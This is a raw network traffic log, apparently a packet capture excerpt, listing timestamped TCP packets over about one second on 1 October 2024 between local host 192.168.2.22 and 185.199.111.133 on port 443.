                                                                                                                                Oct 1, 2024 09:25:27.633806944 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.633825064 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.634681940 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.634712934 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.634737015 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.634742975 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.634757042 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.636801004 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.685753107 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.685781956 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.685883999 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.685965061 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.686042070 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.717142105 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.717169046 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.717338085 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.717338085 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.717338085 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.717367887 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.718033075 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.718055010 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.718113899 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.718113899 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.718133926 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.718170881 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.718698025 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.718724012 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.718763113 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.718782902 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.718825102 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.718825102 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.719398022 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.719423056 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.719472885 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.719494104 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.719521046 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.719521046 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.720295906 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.720324993 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.720371962 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.720372915 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.720388889 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.720411062 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.720419884 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.720441103 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.720484972 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.720499992 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.720531940 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.720561028 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.721314907 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.721358061 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.721381903 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.721400023 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.721426964 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.721427917 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.721427917 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.773580074 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.773624897 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.773705006 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.773746967 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.773866892 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.773866892 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.804475069 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.804496050 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.804543972 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.804577112 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.804601908 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.804603100 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.804831982 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.804858923 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.804893970 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.804912090 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.804938078 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.804938078 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.805454016 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.805489063 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.805510998 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.805526972 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.805571079 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.806365967 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.806391954 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.806441069 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.806441069 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.806471109 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.806504011 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.807270050 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.807291985 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.807334900 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.807353973 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.807379007 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.807379007 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.807944059 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.807971954 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.808007956 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.808027983 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.808046103 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.808053970 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.808053970 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.808078051 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.808104038 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.808115959 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.808142900 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.808198929 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.860579014 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.860603094 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.860832930 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.860832930 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.860832930 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.860857964 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.891279936 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.891308069 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.891350985 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.891398907 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.891429901 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.891992092 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.892013073 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.892055035 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.892076969 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.892101049 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.892472029 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.892505884 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.892540932 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.892559052 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.892585039 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.893023968 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.893045902 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.893086910 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.893105030 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.893127918 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.893955946 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.893982887 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.894016981 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.894036055 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.894058943 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.894862890 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.894884109 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.894926071 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.894943953 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.894984007 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.894984007 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.895708084 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.895733118 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.895768881 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.895787001 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.895811081 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.895811081 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.947489023 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.947511911 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.947581053 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.947582006 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.947629929 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.947665930 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.978261948 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.978287935 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.978329897 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.978358984 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.978409052 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.978409052 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.978409052 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.978998899 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.979020119 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.979053974 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.979068995 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.979100943 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.979190111 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.979584932 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.979619026 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.979661942 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.979661942 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.979676962 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.979707003 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.980281115 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.980305910 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.980343103 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.980372906 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.980398893 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.980493069 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.980942011 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.980964899 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.981002092 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.981019020 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.981041908 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.981127024 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.981631041 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.981678009 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.981690884 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.981703043 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.981730938 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.982291937 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.982342005 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.982825041 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:27.982840061 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:27.982912064 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.034399033 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.034420967 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.034502029 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.034512997 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.037127018 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.065080881 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.065109968 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.065166950 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.065181017 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.065192938 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.065829992 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.065876007 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.066313028 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.066334009 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.067039013 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.067094088 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.067608118 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.067631006 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.086606979 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.086622953 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.086651087 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.086656094 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.086741924 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.093907118 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.121740103 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.121763945 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.121818066 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.121849060 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.121864080 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.134802103 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.152220964 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.152249098 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.152292013 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.152318001 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.152343035 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.153012037 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.153038979 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.153078079 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.153100014 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.153122902 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.153544903 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.153569937 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.153606892 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.153628111 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.153651953 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.154526949 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.154556990 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.154594898 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.154616117 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.154639006 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.155101061 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.155122995 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.155167103 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.155186892 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.155215025 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.155694962 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.155730963 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.155755043 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.155770063 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.155797958 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.156614065 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.156632900 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.156692982 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.156708956 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.162120104 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.208888054 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.208909988 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.208981991 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.208981991 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.209057093 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.214083910 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.239747047 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.239780903 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.239826918 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.239856958 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.239883900 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.240184069 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.240210056 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.240250111 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.240268946 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.240312099 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.240783930 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.240803003 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.240854025 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.240854025 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.240875959 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.241373062 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.241633892 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.241656065 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.241698027 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.241714954 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.241733074 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.241736889 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.241760015 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.241787910 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.241802931 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.241835117 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.242082119 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.242448092 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.242468119 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.242511034 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.242532015 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.242561102 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.242561102 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.243619919 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.243643999 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.243706942 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.243706942 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.243721962 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.243752956 CEST49170443192.168.2.22185.199.111.133
                                                                                                                                Oct 1, 2024 09:25:28.295742989 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.295762062 CEST44349170185.199.111.133192.168.2.22
                                                                                                                                Oct 1, 2024 09:25:28.295845985 CEST49170443192.168.2.22185.199.111.133
